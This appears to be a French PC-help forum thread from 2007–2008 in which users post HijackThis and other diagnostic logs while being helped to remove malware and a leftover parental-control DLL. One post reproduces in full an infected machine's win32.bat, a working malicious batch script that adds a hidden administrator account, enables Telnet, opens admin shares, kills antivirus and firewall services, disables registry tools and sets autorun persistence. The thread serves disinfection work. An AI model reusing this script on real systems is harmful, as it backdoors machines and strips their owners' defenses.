Igniatius

le 10 février 2008

Merci Philipped94,

J'ai fait ce que tu m'a conseillé et ça a marché super...

Juste une petite précision, je ne sais pas si elle a son importance, mais ça n'a fonctionné qu'une fois l'ordinateur rebooter.

Mais bon l'essentiel est que j'ai pu supprimer le fichier "dll" qui m'embêtait et que j'ai retrouvé ma connexion.

Encore merci.

le 9 février 2008

Bonjour,

J'ai voulu installé le controle parental de chez orange sur l'ordinateur de mon fils croyant naivement que bien que n'étant pas chez ce fournisseur cela marcherait

Réalisant mon erreur je l'ai désinstallé.

Et depuis on ne peut plus avoir accès à internet avec cet ordinateur.

J'ai recherché un peu sur la toile et à priori c'est parce que la désinstallation n'a pas été correctement effectuée !

Effectivement je trouve trace d'un dossier "Controle Parental" à l'intérieur duquel se trouve un dossier "BIN" à l'interieur duquel se trouve un fichier : "lsp.dll"

Mon problème c'est que je n'arrive pas à les supprimer.

A tout hasard je vous fournis le log effectué :

Logfile of HijackThis v1.99.1

Scan saved at 19:34:36, on 09/02/2008

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\Explorer.EXE

C:\Program Files\Hijackthis Version Française\VERSION TRADUITE ORIGINALE.EXE

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.fr/ie

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.fr

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.fr/

R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.fr/keyword/%s

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.google.fr/

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

R3 - Default URLSearchHook is missing

O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0\bin\ssv.dll

O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe

O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0\bin\jusched.exe"

O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime

O4 - HKCU\..\RunOnce: [Config] %systemroot%\system32\run.cmd

O4 - HKCU\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll"

O4 - HKCU\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe

O4 - Global Startup: Utilitaire réseau pour SAGEM Wi-Fi 11g USB adapter.lnk = ?

O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe

O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe

O23 - Service: avast! Mail Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe" /service (file missing)

O23 - Service: avast! Web Scanner - Unknown owner - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe" /service (file missing)

O23 - Service: Orange Contrôle Parental (OPTENET_FILTER) - Unknown owner - C:\Program Files\Controle Parental\bin\optproxy.exe (file missing)

Merci par avance pour votre aide.

le 21 juin 2007

Bonjour tout le monde !!!

Je suis à la recherche de MALEKAL MORTE qui intervenait sur ce forum.

Il a commençait à m'aider à résoudre un problème de sécurité mais je n'ai plus de nouvelles depuis 31 mai 2007.

et je suis toujours en rade de micro.

J'espère qu'il ne lui ai rien arrivé de grave .

Donc voilà si d'aventure vous avez des nouvelles... n'hesitez pas à faire passer pour me rassurer sur son compte et puis, je l'avoue, pour finir de résoudre mon problème qui m'empoisonne l'existence.

Au plaisir de vous lire

le 21 juin 2007

Personne ?

le 18 juin 2007

Bonjour à toutes et à tous

Et tout d'abord pour qu'il n'y est pas de malentendu je précise que j'avais ouvert un premier post intitulé "Mon rapport hijackthis" concernant mon problème mais que l'animateur qui m'avait pris en charge ne semble plus présent sur ce forum depuis une vingtaine de jours.

Or je commence a avoir réellement besoin de mon ordinateur pour raisons professionnelles.

Quelqu'un peut-il prendre la relève ?

S'il vous plait !!!!!!

Voici les symptomes :

Mon ordinateur a rebooté tout seul comme un grand.

Au redémarrage, il a créé deux comptes supplémentaires (un nommé "numbers" et l'autre "ADSL") Ces comptes créés sont protégés par un mot de passe. Je ne peux donc pas y avoir accès. Mais surtout ils m'ont "volé" ma qualité de compte administrateur. Je ne peux donc plus gérer grand chose sur mon micro. Pour couronner le tout, je n'arrive plus, non plus, à me connecter à internet via ce micro. Je ne peux donc procéder à aucun scan en ligne. Pour l'accès à ce forum j'utilise un portable branché en réseau chez moi.

Le problème c'est que le pc infecté, car je pense ne pas trop m'avancer en disant qu'il est infecté, est l'ordinateur principal du réseau, je ne peux donc pas avoir accès à mon modem pour une mise à jour du firmware par exemple.

En vous remerciant de votre attention

Sincèrement

Igniatius

le 17 juin 2007

Y'a plus personne pour me répondre ?

Soyez franc et dites le moi si mon cas est désespéré !!!!!

Je ne sais plus quoi faire !!!!!!!

le 8 juin 2007

Heu...

Je me sens seul tout d'un coup

Pas de réponse depuis une petite dizaine de jours.

J'espère qu'il n'est rien arrivé de grave à Malekal Morte...

le 31 mai 2007

Tu n'es pas sur un compte administrateur de la machine ?
Ca expliquerait pourquoi tu dois refaire la manip pour le registre..

Heu...

C'est ce que j'ai précisé lors de mon tout premier post.

La bécane a redémarré en créant deux comptes protégés par mot de passe (que je ne connais pas, bien sûr!!!).

J'ai perdu ma qualité d'administrateur au profit de l'un (ou des deux ) comptes créés.

d'où l'amplification du problème...

le 30 mai 2007

Installe ---> Installe ZoneAlarm

Vire le fichier win32.bat s'il est revenu.

Je ne peux pas instaler ZoneAlarm.

voici le message indiqué :

"L'accès pour effectuer les modifications requises sur la configuration du système vous a été refusé.

Veuillez recommencer l'installation depuis un compte d'administrateur."

le 29 mai 2007

Vire ce fichier de m*rde, redémarre regarde s'il revient.

Voilà qui est fait.

Et le resultat est que les deux lignes reviennent...

le 28 mai 2007

Y a quoi dans ce fichier : C:\WINDOWS\System32\win32.bat ?
clic droit / edition

colle le contenu ici.

1°/ J'ai bien un fichier C:\WINDOWS\System32\win32 mais y'a pas d'extension bat. C'est celui-là.

dans le doute c'est celui que j'ai pris

2°/ En faisant click droit je n'ai pas la mention edition alors j'ai cliqué sur modifié ce qui m'a ouvert le bloc-note

3°/ j'ai donc copié le contenu proposé et c'est ce que je poste ici :

@echo off

@break off

if exist %systemroot%\Lsd.exe goto enx

if exist %programfiles%\Taskdrv.exe (goto av) else goto av2

:av

if exist %systemroot%\Navnet.exe (goto av3)

:av2

attrib -h -s -r %systemroot%\Navnet.exe

attrib -h -s %programfiles%\Taskdrv.exe

attrib -h -s -r %systemroot%\Win.ini

copy SETUP.exe %systemroot%\Navnet.exe

copy PLAYER.exe %systemroot%\Navnet.exe

copy CRACK.exe %systemroot%\Navnet.exe

copy /b "*..exe" %systemroot%\Navnet.exe

copy %programfiles%\Taskdrv.exe %systemroot%\Navnet.exe

copy %systemroot%\Navnet.exe %programfiles%\Taskdrv.exe

cd %systemroot%\

attrib +h +s %programfiles%\Taskdrv.exe

attrib +h +s %systemroot%\Navnet.exe

echo [Windows] >> Win.ini

echo Run = C:\Windows\Navnet.exe >> Win.ini

attrib +h +s +r %systemroot%\Win.ini

reg add HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f

net user nombre ADSL /add

net localgroup "Administrador es" ADSL /add

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Firewall /d %Systemroot%\Navnet.exe /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v kis /d %programfiles%\Taskdrv.exe /f

ping 127.0.0.1 -n 300 > nul

:av3

NET STOP "Centro de Seguridad"

NET STOP "Firewall de Windows/Conexión compartida a Internet (ICS)"

tskill explorer /a

taskkill /f /IM explorer.exe

reg add HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f

net user ADSL ADSL /add

net stop navapsvc

net stop NPFMntor

net stop ccApp

net stop symlcsvc

net stop apvxdwin

net stop pavProxy

net share ADMIN$

net share C$

net share IPC$

net share c=c

net share d=d

net share e=e

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Firewall /d %Systemroot%\Navnet.exe /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v kis /d %programfiles%\Taskdrv.exe /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Firewall /d %Systemroot%\Navnet.exe /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v kis /d %programfiles%\Taskdrv.exe /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

reg add HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel /v Homepage /t REG_DWORD /d 0 /f

reg add HKCU\Software\Microsoft\Internet Explorer\Main /va Start Page /d "http://www.Fuck.com" /f

reg add HKCU\Software\Microsoft\Internet Explorer\Main /v Start Page /t REG_MULTI_SZ /D http://www.fUCK.com /f

reg add HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel /v Homepage /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 /v 1803 /t REG_DWORD /d 3 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disabletaskmgr /t REG_DWORD /d 1 /f

ping 127.0.0.1 -n 100 > nul

tskill explorer /a

tskill iexplore /a

taskkill /f /IM explorer.exe

taskkill /f /IM iexplore.exe

ping 127.0.0.1 -n 100 > nul

start iexplore.exe

tskill msnmsgr /a

tskill emule /a

taskkill /f /IM msnmsgr.exe

taskkill /f /IM emule.exe

ping 127.0.0.1 -n 100 > nul

tskill explorer /a

tskill iexplore /a

taskkill /f /IM explorer.exe

taskkill /f /IM iexplore.exe

start iexplore.exe

ping 127.0.0.1 -n 90 > nul

tskill iexplore /a

taskkill /f /IM iexplore.exe

start iexplore.exe

ping 127.0.0.1 -n 90 > nul

tskill explorer /a

taskkill /f /IM explorer.exe

ping 127.0.0.1 -n 100 > nul

tskill svchost /a

tskill iexplore /a

taskkill /f /IM svchost.exe

taskkill /f /IM iexplore.exe

goto av3

:enx

del /s /q %0

Del /s /q %0 && end

C'est ça que tu voulais ?

le 28 mai 2007

non lol
mais on sait jamais

Pour le registre, regarde là : http://www.zebulon.fr/dossiers/57-2-accede...e-registre.html

"En cas de soucis"

T'as un petit vbs à télécharger, en espérant que les vbs passent !

Bonjour malekal Morte

et désolé pour l'absence de news mais pas chez moi ces derniers jours.

Bon, reprenons,

j'ai suivi tes dernières indications et ben ... rien dechangé.

Je peux fixeret avoir accès aux registres grace à fixswen. mais pas de manière définitive. A chaque redémarrage il faut recommencer.

J'ai vu sur ton dernier lien un outil de nettoyage du registre nommé JV16 je l'ai installé et lancé mais ça a bloqué avant la fin du scan...

voilà les dernières nouvelles

Ca veut vraiment pas, hein?

le 19 mai 2007

Voilà le rapport de scan AVG antispyware

mais tu vas pas être déçu !!!

---------------------------------------------------------

AVG Anti-Spyware - Rapport d'analyse

---------------------------------------------------------

+ Créé à: 13:52:20 19/05/2007

+ Résultat de l'analyse:

Rien à signaler.

Fin du rapport

Ca aide pas, hein ?

le 19 mai 2007

Bonjour Malekal Morte,

voici les news,

En ce qui concerne ton indiquation :

"Télécharge ce fichier sur ton bureau : http://www.malekal.com/download/Activer_regedit_taskmgr.reg

(s'il s'ouvre sur le navigateur, faire un clic droit puis enregistrer la cible du lien sous).

Double-clic dessus et accepte l'inscription des données."

Ca ne marche pas ! Car lorsque je double clique voici ce qui apparait :

Editeur du registre :

La modification du Registre a été désactivée par votre administrateur

Et pour ce qui est du scan en ligne je ne peux toujours pas me connecter.

1/ Parce que, bien que l'ordinateur détecte mon réseau, il n'arrive pas à se connecter dessus.

2/ Parce que, bien que l'ordinateur ai cessé de redémarrer à tout bout de champ, c'est maintenant au bureau de le faire. Et ça c'est embêtant.

3/ J'ai toujours IE qui se lance, lui aussi n'importe quand ! mais comme il n'y a pas de connexion, il va pas bien loin...

Je t'avoue que là, j'ai comme qui dirait un léger coup de mou !!!!

J'attends donc ton prochain avis avec impatience.

Et j'en profite pour te renouveler mes remerciements pour ton aide.

le 17 mai 2007

Bonjour Malekal Morte,

voici les 2 rapports navilog1

Voilà le premier :

Search Navipromo version 2.0.1 commencé le 17/05/2007 à 17:04:36,57

!!! Attention,ce rapport peut indiquer des fichiers/programmes légitimes!!!

!!! Poster ce rapport sur le forum pour le faire analyser !!!

!!! Ne pas lancer la partie désinfection sans l'avis d'un spécialiste !!!

Fix lancé depuis C:\Program Files\navilog1

Mise a jour le 10.05.2007 a 22h00 by IL-MAFIOSO

Executé en mode normal

*** Recherche Programmes installes ***

*** Recherche dossiers dans C:\WINDOWS ***

*** Recherche dossiers dans C:\Program Files ***

C:\Program Files\MessengerSkinner trouvé !

*** Recherche dossiers dans C:\Documents and Settings\All Users\Application Data ***

*** Recherche dossiers dans C:\Documents and Settings\Pascal\Application Data ***

...\Application Data\MessengerSkinner trouvé !

*** Recherche avec BlackLight Engine/F-secure ***

BlackLight Engine est un produit de F-secure, pour + d'infos :

http://www.f-secure.com/blacklight/blacklight_help.html

F-SECURE BLACKLIGHT ROOTKIT ELIMINATOR

======================================

This is a beta version. It will expire on 1st of April, 2007.

Version information: 2.2.1061.

[+] Started on 05/17/07 at 17:04:41.

[+] Initializing ...

[+] Starting scan, press Ctrl-C to abort.

[+] Scanning for hidden items ...........................

[-] Scan aborted due to user logoff.

[+] Summary: 0 hidden item(s) found, 0 scheduled for renaming.

[+] Exited on 05/17/07 at 17:07:44 (return code = 2).

*** Recherche fichiers ***

C:\WINDOWS\pack.epk trouvé !

C:\WINDOWS\system32\nvs2.inf trouvé !

*** Recherche cles registre ***

Recherche dans [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs]

Recherche dans [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ModuleUsage]

Recherche Clé Magic Control

HKEY_CURRENT_USER\Software\Lanconfig trouvé !

HKEY_USERS\S-1-5-21-854245398-920026266-1202660629-1005\Software\Lanconfig trouvé !

*** Module de Recherche complémentaire ***

(Recherche fichiers spécifiques)

1)Recherche fichiers connus:

2)Recherche Heuristique :

*

C:\WINDOWS\system32\rgnepuvwco.dat trouvé !

**

C:\WINDOWS\system32\rgnepuvwco.dat trouvé !

***

****

C:\WINDOWS\system32\rgnepuvwco_navps.dat trouvé !

*****

C:\WINDOWS\system32\rgnepuvwco_nav.dat trouvé !

C:\WINDOWS\system32\rgnepuvwco_navup.dat trouvé !

******

*******

********

*** Analyse Terminé le 17/05/2007 à 17:08:57,17 ***

et le second :

Clean Navipromo version 2.0.1 commencé le 17/05/2007 à 17:16:05,00

Fix lancé depuis C:\Program Files\navilog1

Mise a jour le 10.05.2007 a 22h00 by IL-MAFIOSO

Mode suppression par méthode manuelle

Nom du fichier saisi : rgnepuvwco

*** Recherche, Creation backups et suppression ***

C:\WINDOWS\system32\rgnepuvwco.exe absent !

C:\WINDOWS\system32\rgnepuvwco_navtmp.dat absent !

C:\WINDOWS\system32\rgnepuvwco_m2s.xml absent !

C:\WINDOWS\prefetch\rgnepuvwco*.pf absent !

C:\WINDOWS\System32\rgnepuvwco.dat trouvé !

Copie C:\WINDOWS\system32\rgnepuvwco.dat realise avec succes !

C:\WINDOWS\system32\rgnepuvwco.dat supprimé !

C:\WINDOWS\System32\rgnepuvwco_nav.dat trouvé !

Copie C:\WINDOWS\system32\rgnepuvwco_nav.dat realise avec succes !

C:\WINDOWS\system32\rgnepuvwco_nav.dat supprimé !

C:\WINDOWS\System32\rgnepuvwco_navps.dat trouvé !

Copie C:\WINDOWS\system32\rgnepuvwco_navps.dat realise avec succes !

C:\WINDOWS\system32\rgnepuvwco_navps.dat supprimé !

C:\WINDOWS\System32\rgnepuvwco_navup.dat trouvé !

Copie C:\WINDOWS\system32\rgnepuvwco_navup.dat realise avec succes !

C:\WINDOWS\system32\rgnepuvwco_navup.dat supprimé !

*** Suppression dossiers dans C:\WINDOWS ***

*** Suppression dossiers dans C:\Program Files ***

C:\Program Files\MessengerSkinner ...suppression...

C:\Program Files\MessengerSkinner supprimé !

*** Suppression dossiers dans C:\Documents and Settings\All Users\Application Data ***

*** Suppression dossiers dans C:\Documents and Settings\Pascal\Application Data ***

...\Application Data\MessengerSkinner ...suppression...

...\Application Data\MessengerSkinner supprimé !

*** Suppression fichiers ***

C:\WINDOWS\pack.epk supprimé !

C:\WINDOWS\system32\nvs2.inf supprimé !

*** Suppression fichiers temporaires ***

Nettoyage contenu C:\WINDOWS\Temp effectué !

Nettoyage contenu C:\Documents and Settings\Pascal\Local Settings\Temp effectué !

*** Sauvegarde du registre vers dossier Backupnavi***

sauvegarde du registre realise avec succes !

*** Nettoyage registre ***

Nettoyage registre Ok

*** Traitement Recherche complémentaire ***

(Recherche fichiers spécifiques)

1)Recherche fichiers connus:

2)Recherche et Suppression Heuristique :

*

**

***

****

*****

******

*******

********

*** Nettoyage termine le 17/05/2007 à 17:24:55,33 ***

A noter (je sais pas si c'est important) lors du redémarrage et avant le deuxieme log, une fenêtre est apparue :

Editeur de registre :

La modification du registre a été déssactivée par votre administrateur.

Encore merci pour ton aide.

le 15 mai 2007

cool!
bien joué

Ouais, je sais, je sais, chui comme ça, moi

Bon sinon, voilà le rapport diaghelp :

DiagHelp version v1.07.4 - http://www.malekal.com

excute le 15/05/2007 à 9:28:31,63

Liste des fichiers modifies/crees dans les 24 dernieres heures...

C:\Documents and Settings\Administrateur\ntuser.dat.LOG

C:\Documents and Settings\Clément\ntuser.dat.LOG

C:\Documents and Settings\Emilie\ntuser.dat.LOG

C:\Documents and Settings\LocalService\Cookies\index.dat

C:\Documents and Settings\LocalService\Local Settings\desktop.ini

C:\Documents and Settings\LocalService\NTUSER.DAT

C:\Documents and Settings\LocalService\ntuser.dat.LOG

C:\Documents and Settings\NetworkService

C:\Documents and Settings\NetworkService\Local Settings\desktop.ini

C:\Documents and Settings\NetworkService\ntuser.dat.LOG

C:\Documents and Settings\Pascal\Bureau

C:\Documents and Settings\Pascal\Bureau\catchme.log

C:\Documents and Settings\Pascal\Bureau\DiagHelp

C:\Documents and Settings\Pascal\Bureau\DiagHelp\temp.txt

C:\Documents and Settings\Pascal\Cookies

C:\Documents and Settings\Pascal\Cookies\pascal@www.kaspersky[1].txt

C:\Documents and Settings\Pascal\Local Settings\desktop.ini

C:\Documents and Settings\Pascal\Local Settings\Temp\KAV Updater update files\1065

C:\Documents and Settings\Pascal\NTUSER.DAT

C:\Documents and Settings\Pascal\ntuser.ini

C:\pagefile.sys

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\error.txt

C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\logfile.txt

C:\resultat.txt

C:\WINDOWS.log

C:\WINDOWS\bootstat.dat

C:\WINDOWS\Debug\PASSWD.LOG

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5806.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5808.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5810.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5812.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5814.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5816.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5817.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5818.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5820.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5822.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5824.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5826.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5827.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5828.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5830.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5832.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5833.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5834.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\CollectedData_5835.xml

C:\WINDOWS\PCHEALTH\HELPCTR\DataColl\history_db.xml

C:\WINDOWS\QTFont.qfn

C:\WINDOWS\SchedLgU.Txt

C:\WINDOWS\system32\drivers

C:\WINDOWS\system32\drivers\fidbox.idx

C:\WINDOWS\system32\drivers\fidbox2.idx

C:\WINDOWS\system32\drivers\klick.sys

C:\WINDOWS\system32\drivers\klin.sys

C:\WINDOWS\system32\LVCOMSX.LOG

C:\WINDOWS\system32\nvapps.xml

C:\WINDOWS\system32\win32.bat

C:\WINDOWS\system32\wpa.dbl

C:\WINDOWS\Tasks\SA.DAT

C:\WINDOWS\Temp\WGAErrLog.txt

C:\WINDOWS\Temp\WGANotify.settings

C:\WINDOWS\Temp\~DFD5B9.tmp

C:\WINDOWS\Temp\~DFD6A7.tmp

C:\WINDOWS\Temp\~DFD703.tmp

C:\WINDOWS\Temp\~DFD75D.tmp

C:\WINDOWS\Temp\~DFDAD6.tmp

C:\WINDOWS\wiadebug.log

C:\WINDOWS\wiaservc.log

Liste des derniers fichies modifies/crees dans windir\system32

C:\WINDOWS\System32/drivers\fidbox2.dat -->15/05/2007 09:38:56

C:\WINDOWS\System32/drivers\fidbox.dat -->15/05/2007 09:34:26

C:\WINDOWS\System32/drivers\fidbox2.idx -->14/05/2007 19:35:54

C:\WINDOWS\System32/drivers\fidbox.idx -->14/05/2007 19:35:52

C:\WINDOWS\System32/drivers\klin.sys -->14/05/2007 18:34:15

C:\WINDOWS\System32/drivers\klick.sys -->14/05/2007 18:34:15

C:\WINDOWS\System32/drivers\ntfs.sys -->09/02/2007 13:10:35

C:\WINDOWS\System32\win32.bat -->15/05/2007 09:27:32

C:\WINDOWS\System32\LVCOMSX.LOG -->15/05/2007 09:27:25

C:\WINDOWS\System32\nvapps.xml -->15/05/2007 09:26:44

C:\WINDOWS\System32\wpa.dbl -->15/05/2007 09:26:11

C:\WINDOWS\System32\MRT.exe -->27/04/2007 22:45:12

C:\WINDOWS\System32\FNTCACHE.DAT -->04/04/2007 10:39:27

C:\WINDOWS\System32\ieapfltr.dll -->03/04/2007 16:29:23

C:\WINDOWS\System32\ieapfltr.dat -->03/04/2007 06:36:20

C:\WINDOWS\System32\lvcoinst.log -->31/03/2007 21:45:30

C:\WINDOWS\System32\rgnepuvwco.dat -->25/03/2007 16:31:57

C:\WINDOWS\System32\perfh00C.dat -->25/03/2007 10:23:57

C:\WINDOWS\System32\perfh009.dat -->25/03/2007 10:23:57

C:\WINDOWS\System32\perfc00C.dat -->25/03/2007 10:23:57

C:\WINDOWS\System32\perfc009.dat -->25/03/2007 10:23:57

C:\WINDOWS\System32\PerfStringBackup.INI -->25/03/2007 10:23:55

C:\WINDOWS\System32\rgnepuvwco_navup.dat -->23/03/2007 17:22:47

C:\WINDOWS\System32\EPPICResdb0000 -->20/03/2007 13:44:51

C:\WINDOWS\System32\EPPICResdb -->20/03/2007 13:44:51

C:\WINDOWS\System32\winsrv.dll -->17/03/2007 15:44:47

C:\WINDOWS\System32\LegitCheckControl.dll -->15/03/2007 18:19:28

C:\WINDOWS\System32\WgaTray.exe -->15/03/2007 18:17:20

C:\WINDOWS\System32\WgaLogon.dll -->15/03/2007 18:16:48

C:\WINDOWS\System32\xpsp3res.dll -->09/03/2007 13:51:20

C:\WINDOWS\System32\user32.dll -->08/03/2007 17:37:50

C:\WINDOWS\System32\mf3216.dll -->08/03/2007 17:37:50

C:\WINDOWS\WindowsUpdate.log -->15/05/2007 09:34:36

C:\WINDOWS\QTFont.qfn -->15/05/2007 09:26:46

C:\WINDOWS.log -->15/05/2007 09:16:14

C:\WINDOWS\wiadebug.log -->15/05/2007 09:15:50

C:\WINDOWS\wiaservc.log -->15/05/2007 09:15:36

C:\WINDOWS\bootstat.dat -->15/05/2007 09:15:14

C:\WINDOWS\SchedLgU.Txt -->14/05/2007 19:35:32

C:\WINDOWS\setupapi.log -->13/05/2007 17:44:03

C:\WINDOWS\ntbtlog.txt -->13/05/2007 16:26:07

C:\WINDOWS\system.ini -->13/05/2007 16:21:01

C:\WINDOWS\QTFont.for -->12/05/2007 15:38:26

C:\WINDOWS\Sti_Trace.log -->12/05/2007 12:10:50

C:\WINDOWS\win.ini -->10/05/2007 15:43:33

C:\WINDOWS\NeroDigital.ini -->10/05/2007 11:28:13

C:\WINDOWS\POSTER.INI -->24/04/2007 15:58:56

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\WINDOWS\system32

20/08/2004 01:09 6 144 csrss.exe

1 fichier(s) 6 144 octets

0 Rép(s) 3 504 156 672 octets libres

Contenu de Downloaded Program Files

Le volume dans le lecteur C n'a pas de nom.

Le numéro de série du volume est D0EA-F27E

Répertoire de C:\WINDOWS\Downloaded Program Files

13/05/2007 17:44 <REP> .

13/05/2007 17:44 <REP> ..

10/02/2005 20:27 65 desktop.ini

25/07/2002 18:13 24 576 dwusplay.dll

25/07/2002 18:13 196 608 dwusplay.exe

07/06/2006 11:09 1 249 erma.inf

25/07/2002 18:05 172 032 isusweb.dll

04/03/2005 04:52 752 jinstall-1_5_0_02.inf

08/08/2006 11:45 576 kavwebscan.inf

20/01/2000 15:25 1 162 Microsoft XML Parser for Java.osd

27/03/2006 13:00 5 019 swflash.inf

9 fichier(s) 402 039 octets

Total des fichiers listés :

9 fichier(s) 402 039 octets

2 Rép(s) 3 504 156 672 octets libres

Recherche de rootkit! (Merci S!Ri)

infection possible Magic.Control : un scan F-Secure BlackLight est recommandé

Recherche d'infections connues

catchme 0.3.660 W2K/XP/Vista - userland rootkit detector by Gmer, http://www.gmer.net

Rootkit scan 2007-05-15 09:47:05

Windows 5.1.2600 Service Pack 2 NTFS

scanning hidden processes ...

scanning hidden services ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully

hidden processes: 0

hidden services: 0

hidden files: 0

Liste des programmes installes

7.9

Active Virus Shield

Ad-Aware SE Personal

Adobe Acrobat 5.0

Adobe Flash Player 9 ActiveX

Adobe Reader 7.0.9

Archiveur WinRAR

Atlas mondial Microsoft Encarta 2001

AVG Anti-Spyware 7.5

Capturino

CCleaner (remove only)

Codeur Windows Media Série 9

Correctif pour Windows XP (KB914440)

Correctif Windows XP - KB867282

Correctif Windows XP - KB873333

Correctif Windows XP - KB873339

Correctif Windows XP - KB885250

Correctif Windows XP - KB885835

Correctif Windows XP - KB885836

Correctif Windows XP - KB886185

Correctif Windows XP - KB887472

Correctif Windows XP - KB887742

Correctif Windows XP - KB888113

Correctif Windows XP - KB888302

Correctif Windows XP - KB890047

Correctif Windows XP - KB890175

Correctif Windows XP - KB890859

Correctif Windows XP - KB890923

Correctif Windows XP - KB891781

Correctif Windows XP - KB893066

Correctif Windows XP - KB893086

DartyBox

Digital Camera

eMule

EPSON Attach To Email

EPSON Copy Utility 3

EPSON Easy Photo Print

EPSON File Manager

EPSON Image Clip Palette

EPSON Logiciel imprimante

EPSON Scan

EPSON Scan Assistant

FMS

Haali Media Splitter

HijackThis 1.99.1

Hijackthis Version Française 1.99.0.1

Hotfix for Windows Media Format 11 SDK (KB929399)

Hotfix for Windows XP (KB909394)

Hotfix for Windows XP (KB915865)

Hotfix for Windows XP (KB926239)

Icatch(IV) Camera Driver

Installation de Microsoft Works Suite 2001

J2SE Runtime Environment 5.0 Update 11

J2SE Runtime Environment 5.0 Update 3

J2SE Runtime Environment 5.0 Update 6

J2SE Runtime Environment 5.0 Update 9

Kaspersky On-line Scanner

Kaspersky Online Scanner

L'Assistant DartyBox

Language pack for Ad-Aware SE

Lecteur Windows Media 11

Logitech Print Service

Logitech QuickCam

Matroska Pack

Microsoft ActiveSync

Microsoft Compression Client Pack 1.0 for Windows XP

Microsoft DirectX Transform optional components

Microsoft Internationalized Domain Names Mitigation APIs

Microsoft National Language Support Downlevel APIs

Microsoft Office Professional Edition 2003

Microsoft Plus! Windows CE, Handheld PC Edition 3.0

Microsoft User-Mode Driver Framework Feature Pack 1.0

Microsoft Works 6.0

Mise à jour de sécurité pour Lecteur Windows Media (KB911564)

Mise à jour de sécurité pour Lecteur Windows Media 10 (KB911565)

Mise à jour de sécurité pour Lecteur Windows Media 10 (KB917734)

Mise à jour de sécurité pour Lecteur Windows Media 6.4 (KB925398)

Mise à jour de sécurité pour Windows Internet Explorer 7 (KB928090)

Mise à jour de sécurité pour Windows Internet Explorer 7 (KB929969)

Mise à jour de sécurité pour Windows Internet Explorer 7 (KB931768)

